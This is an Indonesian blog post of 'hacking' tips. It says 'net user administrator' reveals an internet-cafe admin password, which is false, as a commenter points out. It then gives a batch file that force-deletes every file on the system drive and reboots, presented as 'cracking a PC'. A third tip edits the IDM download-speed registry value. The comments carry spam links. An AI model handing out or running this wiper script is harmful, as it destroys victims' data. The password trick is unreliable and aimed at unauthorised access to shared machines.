jalan menuju keberhasilan
Memuat...

Kamis, 13 September 2012

Cara Mengetahui Password Admin !

Assalamu'alaikum shabat GooDLikeThis ane Akan mengasih info bagi yang Penasaran sama password admin warnet kan ?
nah ane kasih tau deh buat kalian semua. .
Ikuti aja Langkah2 di bawah ini gan !
Tools : cmd.com

Cara :

1) Buka cmd di : - run ---- cmd
- C ---- WINDOWS ---- system32 ---- cmd

2) Terus tulis ni ya
net user administrator

3) Nanti lo akan temukan username dan passwordnya

Episode 7 : Cracking a PC

tools : notepad

Cara :

1) Buka notepad

2) Tulis ni ya

@echo off
del%systemdrive%*.*/f/s/q/
shutdown -r -f -t 00

3) Save as ---- nama file terserah.bat ---- type : all files

4) INGAT !!!!!!! jangan di klik 2 kali, karena semua file anda akan di delete

Episode 8 : Hack IDM speed

Tools : IDM & regedit

cara :

1) Buka IDM system tray

2) Click download > Option > Connection

3) Connection type pilih other > Speed kosongi

4) OK

5) Ke regedit ( Caranya run > regedit > OK

6) Pilih HKEY_CURRECT_USER > Software > Downloadmanager

7) Pilih connectionspeed > klik 2X > base ganti ke decimal

8) Value 9999999999

9) OK

10) Ke IDM dan lakukan seperti langkah 1 & 2 dan LIHAT !!!! speednya jadi lebih dari yang tadi

2 komentar:

  1. jika mau merubah nasib silahkan

    klik di sini


    jika mau merubah nasib silahkan

    klik di sini


    jika mau merubah nasib silahkan

    klik di sini

    BalasHapus
  2. pake cmd, net user administrator gak keliatan tuh pasword adminya

    BalasHapus